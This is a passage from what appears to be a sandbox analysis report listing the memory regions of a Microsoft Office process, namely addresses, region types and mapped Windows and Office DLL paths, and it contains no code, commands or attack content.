Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll") Region: id = 533 start_va = 0x72840000 end_va = 0x72842fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 534 start_va = 0x72850000 end_va = 0x72852fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 535 start_va = 0x72860000 end_va = 0x72862fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 536 start_va = 0x72870000 end_va = 0x7294bfff monitored = 0 entry_point = 0x7289c130 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\ucrtbase.dll") Region: id = 537 start_va = 0x72950000 end_va = 0x72b04fff monitored = 0 entry_point = 0x72a43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 538 start_va = 0x72b10000 end_va = 0x72b3efff monitored = 0 entry_point = 0x72b11142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 539 start_va = 0x72b40000 end_va = 0x72b42fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll") Region: id = 540 start_va = 0x72b50000 end_va = 0x72b52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 541 start_va = 0x72b60000 end_va = 0x72b76fff monitored = 0 entry_point = 0x72b61c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 542 start_va = 0x72b80000 end_va = 0x72c4afff monitored = 0 entry_point = 0x72b96a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 543 start_va = 0x72c50000 end_va = 0x72cb4fff monitored = 0 entry_point = 0x72c6fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 544 start_va = 0x72e90000 end_va = 0x73048fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 545 start_va = 0x73050000 end_va = 0x731c2fff monitored = 0 entry_point = 0x73051000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 546 start_va = 0x731d0000 end_va = 0x731e6fff monitored = 0 entry_point = 0x731dd36d region_type = mapped_file name = "msohev.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msohev.dll") Region: id = 547 start_va = 0x73270000 end_va = 0x73272fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 548 start_va = 0x73280000 end_va = 0x73282fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 549 start_va = 0x73290000 end_va = 0x73292fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 550 start_va = 0x732a0000 end_va = 0x732a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 551 start_va = 0x732b0000 end_va = 0x732b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 552 start_va = 0x732c0000 end_va = 0x732c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 553 start_va = 0x732d0000 end_va = 0x732d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 554 start_va = 0x732e0000 end_va = 0x732e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 555 start_va = 0x732f0000 end_va = 0x732f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 556 start_va = 0x73300000 end_va = 0x73302fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 557 start_va = 0x73310000 end_va = 0x73313fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 558 start_va = 0x73460000 end_va = 0x73463fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 559 start_va = 0x73470000 end_va = 0x73484fff monitored = 0 entry_point = 0x7347b1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 560 start_va = 0x73490000 end_va = 0x734fcfff monitored = 0 entry_point = 0x734cab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 561 start_va = 0x73540000 end_va = 0x7356dfff monitored = 0 entry_point = 0x735416ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 562 start_va = 0x73650000 end_va = 0x73679fff monitored = 0 entry_point = 0x736510ed region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 563 start_va = 0x73c40000 end_va = 0x73cf1fff monitored = 0 entry_point = 0x73c916fd region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 564 start_va = 0x73d00000 end_va = 0x73d2efff monitored = 0 entry_point = 0x73d0c7a2 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 565 start_va = 0x73d30000 end_va = 0x73e9efff monitored = 0 entry_point = 0x73d3d50e region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 566 start_va = 0x73ea0000 end_va = 0x73f94fff monitored = 0 entry_point = 0x73eb0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 567 start_va = 0x73fa0000 end_va = 0x73febfff monitored = 0 entry_point = 0x73fa2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 568 start_va = 0x74020000 end_va = 0x7405afff monitored = 0 entry_point = 0x7402128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 569 start_va = 0x74060000 end_va = 0x74076fff monitored = 0 entry_point = 0x74063573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 570 start_va = 0x74080000 end_va = 0x74084fff monitored = 0 entry_point = 0x740810f6 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 571 start_va = 0x740c0000 end_va = 0x740cffff monitored = 0 entry_point = 0x740c38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 572 start_va = 0x74170000 end_va = 0x74182fff monitored = 0 entry_point = 0x74171d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 573 start_va = 0x74190000 end_va = 0x7419dfff monitored = 0 entry_point = 0x74191235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 574 start_va = 0x741b0000 end_va = 0x7422ffff monitored = 0 entry_point = 0x741c37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 575 start_va = 0x742e0000 end_va = 0x742e8fff monitored = 0 entry_point = 0x742e1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 576 start_va = 0x74370000 end_va = 0x74390fff monitored = 0 entry_point = 0x7437145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 577 start_va = 0x743a0000 end_va = 0x743aafff monitored = 0 entry_point = 0x743a1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 578 start_va = 0x743b0000 end_va = 0x745effff monitored = 0 entry_point = 0x743b66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 579 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 580 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 581 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 582 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 583 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 584 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 585 start_va = 0x75590000 end_va = 0x7560afff monitored = 0 entry_point = 0x75591aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 586 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 587 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 588 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 589 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 590 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 591 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 592 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 593 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 594 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 595 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 596 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 597 start_va = 0x76b60000 end_va = 0x76b8efff monitored = 0 entry_point = 0x76b62a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 598 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 599 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 600 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 601 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 602 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 603 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 604 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 605 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 606 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 607 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 608 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 609 start_va = 0x77230000 end_va = 0x77232fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 610 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 611 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 612 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 613 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 614 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 615 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 616 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 617 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 618 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 619 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 620 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 621 start_va = 0x7ef42000 end_va = 0x7ef44fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef42000" filename = "" Region: id = 622 start_va = 0x7ef45000 end_va = 0x7ef47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef45000" filename = "" Region: id = 623 start_va = 0x7ef48000 end_va = 0x7ef4afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef48000" filename = "" Region: id = 624 start_va = 0x7ef4b000 end_va = 0x7ef4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef4b000" filename = "" Region: id = 625 start_va = 0x7ef4e000 end_va = 0x7ef50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef4e000" filename = "" Region: id = 626 start_va = 0x7ef51000 end_va = 0x7ef53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef51000" filename = "" Region: id = 627 start_va = 0x7ef54000 end_va = 0x7ef56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef54000" filename = "" Region: id = 628 start_va = 0x7ef57000 end_va = 0x7ef59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef57000" filename = "" Region: id = 629 start_va = 0x7ef5a000 end_va = 0x7ef5cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef5a000" filename = "" Region: id = 630 start_va = 0x7ef5d000 end_va = 0x7ef5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef5d000" filename = "" Region: id = 631 start_va = 0x7ef60000 end_va = 0x7ef6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef60000" filename = "" Region: id = 632 start_va = 0x7ef70000 end_va = 0x7ef7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef70000" filename = "" Region: id = 633 start_va = 0x7ef80000 end_va = 0x7ef82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 634 start_va = 0x7ef83000 end_va = 0x7ef85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 635 start_va = 0x7ef86000 end_va = 0x7ef88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 636 start_va = 0x7ef89000 end_va = 0x7ef8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 637 start_va = 0x7ef8c000 end_va = 0x7ef8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 638 start_va = 0x7ef8f000 end_va = 0x7ef91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 639 start_va = 0x7ef92000 end_va = 0x7ef94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 640 start_va = 0x7ef95000 end_va = 0x7ef97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 641 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 642 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 643 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 644 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 645 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 646 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 647 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 648 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 649 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 650 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = 